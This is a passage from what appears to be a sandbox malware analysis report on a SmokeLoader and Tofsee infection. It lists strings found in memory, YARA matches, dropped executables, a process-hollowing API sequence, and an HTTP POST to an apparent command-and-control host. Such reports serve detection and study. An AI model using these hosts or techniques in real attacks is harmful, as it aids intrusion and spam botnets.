music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z||.||d5cdcec3-04df-404e-ba07-3240047c89f9||1152921505694348672||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                          Source: svchost.exe, 00000012.00000003.386418212.000001994C78A000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.386449355.000001994C79B000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z||.||d5cdcec3-04df-404e-ba07-3240047c89f9||1152921505694348672||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                          Source: 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpString found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
                          Source: 7D0A.exe, 00000025.00000002.523253822.0000000002B84000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.523539802.0000000002CAE000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524054463.0000000002E2D000.00000004.00000001.sdmp, 7D0A.exe, 00000025.00000002.524328614.0000000002EED000.00000004.00000001.sdmpString found in binary or memory: m9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                          Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qlxnfuhj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: host-data-coin-11.com
                          Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.3:49760 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49804 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.3:49858 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49862 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49876 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49884 version: TLS 1.2

                          Key, Mouse, Clipboard, Microphone and Screen Capturing:

                          barindex
                          Yara detected SmokeLoaderShow sources
                          Source: Yara matchFile source: 15.2.rwjfsvd.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.1.eIxMVDoQF3.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.eIxMVDoQF3.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.0.rwjfsvd.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.0.rwjfsvd.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.2.rwjfsvd.5715a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.0.rwjfsvd.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.eIxMVDoQF3.exe.6515a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 15.1.rwjfsvd.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000F.00000002.382566740.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000F.00000002.382707049.00000000004D1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.332260069.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.332377268.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000000.318144404.0000000002E21000.00000020.00020000.sdmp, type: MEMORY
                          Source: rwjfsvd, 0000000E.00000002.368973263.00000000007AA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                          Spam, unwanted Advertisements and Ransom Demands:

                          barindex
                          Yara detected TofseeShow sources
                          Source: Yara matchFile source: 24.2.743F.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.743F.exe.570e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.743F.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.3.743F.exe.590000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000018.00000002.432619186.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000002.432841929.0000000000570000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000003.392346980.0000000000590000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 743F.exe PID: 6640, type: MEMORYSTR

                          System Summary:

                          barindex
                          PE file has nameless sectionsShow sources
                          Source: 6CF.exe.10.drStatic PE information: section name:
                          Source: 6CF.exe.10.drStatic PE information: section name:
                          Source: 6CF.exe.10.drStatic PE information: section name:
                          Source: 6CF.exe.10.drStatic PE information: section name:
                          Source: 6CF.exe.10.drStatic PE information: section name:
                          Source: 6CF.exe.10.drStatic PE information: section name:
                          Source: 1547.exe.10.drStatic PE information: section name:
                          Source: 1547.exe.10.drStatic PE information: section name:
                          Source: 1547.exe.10.drStatic PE information: section name:
                          Source: 1547.exe.10.drStatic PE information: section name:
                          Source: 1547.exe.10.drStatic PE information: section name:
                          Source: 1547.exe.10.drStatic PE information: section name:
                          Source: 3A08.exe.10.drStatic PE information: section name:
                          Source: 3A08.exe.10.drStatic PE information: section name:
                          Source: 3A08.exe.10.drStatic PE information: section name:
                          Source: 3A08.exe.10.drStatic PE information: section name:
                          Source: 3A08.exe.10.drStatic PE information: section name:
                          Source: 3A08.exe.10.drStatic PE information: section name:
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6800 -ip 6800
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 0_2_0042A450
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 0_2_0042B230
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 0_2_00424F20
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 1_2_00402A5F
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 1_2_00402AB3
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 1_1_00402A5F
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 1_1_00402B2E
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 14_2_00573253
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 14_2_005731FF
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 15_2_00402A5F
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 15_2_00402AB3
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 15_1_00402A5F
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 15_1_00402AB3
                          Source: C:\Users\user\AppData\Local\Temp\F805.exeCode function: 16_2_004027CA
                          Source: C:\Users\user\AppData\Local\Temp\F805.exeCode function: 16_2_00401FF1
                          Source: C:\Users\user\AppData\Local\Temp\F805.exeCode function: 16_2_0040158E
                          Source: C:\Users\user\AppData\Local\Temp\F805.exeCode function: 16_2_004015A6
                          Source: C:\Users\user\AppData\Local\Temp\F805.exeCode function: 16_2_004015BC
                          Source: C:\Users\user\AppData\Local\Temp\F805.exeCode function: 16_2_00411065
                          Source: C:\Users\user\AppData\Local\Temp\F805.exeCode function: 16_2_00412A02
                          Source: C:\Users\user\AppData\Local\Temp\F805.exeCode function: 16_2_0040CAC5
                          Source: C:\Users\user\AppData\Local\Temp\F805.exeCode function: 16_2_00410B21
                          Source: C:\Users\user\AppData\Local\Temp\F805.exeCode function: 16_2_004115A9
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00410800
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00411280
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_004103F0
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_004109F0
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00580A50
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00580640
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_00580C40
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: 23_2_005814D0
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeCode function: 24_2_0040C913
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeCode function: 24_2_0042B1B0
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeCode function: 24_2_0042A3D0
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeCode function: 24_2_00424EA0
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 25_2_019C96F0
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 25_2_019C0470
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 25_2_019C0462
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 25_2_032F53F8
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 25_2_032F1810
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 25_2_032F2E48
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 25_2_032F0448
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 25_2_0330A430
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 25_2_03305B58
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 25_2_033008B0
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 25_2_0330AD68
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 25_2_03302C88
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 25_2_033090D3
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 25_2_033089F7
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 25_2_05770133
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 37_2_00F7EC28
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 37_2_05CEC408
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 37_2_05CE6100
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 37_2_05CED8A8
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 37_2_05CE5830
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 37_2_05CE9200
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 37_2_05CE54E8
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 37_2_05CEDE47
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 37_2_05CED899
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 37_2_05CE1213
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 37_2_06912060
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 37_2_06918D88
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 37_2_069109F8
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 37_2_069175C0
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeCode function: 37_2_0691AF90
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeCode function: 24_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,
                          Source: eIxMVDoQF3.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: eIxMVDoQF3.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: eIxMVDoQF3.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: eIxMVDoQF3.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: E5C8.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: E5C8.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: E5C8.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: F6C0.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: F6C0.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: F6C0.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: F6C0.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 1FD7.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 1FD7.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 1FD7.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 27D7.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: F805.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: F805.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: F805.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: B50.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: B50.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: B50.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: B50.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 743F.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 743F.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 743F.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 743F.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: rwjfsvd.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: rwjfsvd.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: rwjfsvd.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: rwjfsvd.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: tvdcssmj.exe.24.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: tvdcssmj.exe.24.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: tvdcssmj.exe.24.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: tvdcssmj.exe.24.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                          Source: C:\Users\user\AppData\Local\Temp\7D0A.exeSection loaded: mscorjit.dll
                          Source: eIxMVDoQF3.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\icpymrdv\
                          Source: C:\Users\user\AppData\Local\Temp\B50.exeCode function: String function: 004048D0 appears 460 times
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: String function: 00422C90 appears 133 times
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: String function: 0041E410 appears 172 times
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeCode function: String function: 0041E370 appears 32 times
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeCode function: String function: 00572794 appears 35 times
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeCode function: String function: 0040EE2A appears 40 times
                          Source: C:\Users\user\AppData\Local\Temp\743F.exeCode function: String function: 00402544 appears 53 times
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 1_2_00401962 Sleep,NtTerminateProcess,
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 1_2_0040196D Sleep,NtTerminateProcess,
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 1_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 1_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 1_2_00401A0B NtTerminateProcess,
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 1_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 1_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 1_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 1_2_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 1_2_00402491 NtOpenKey,
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 1_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 1_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 1_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 1_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 1_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 1_1_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\eIxMVDoQF3.exeCode function: 1_1_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 14_2_00570110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 15_2_00401962 Sleep,NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 15_2_0040196D Sleep,NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 15_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 15_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 15_2_00401A0B NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 15_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 15_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 15_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 15_2_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 15_2_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 15_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 15_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 15_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\rwjfsvdCode function: 15_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
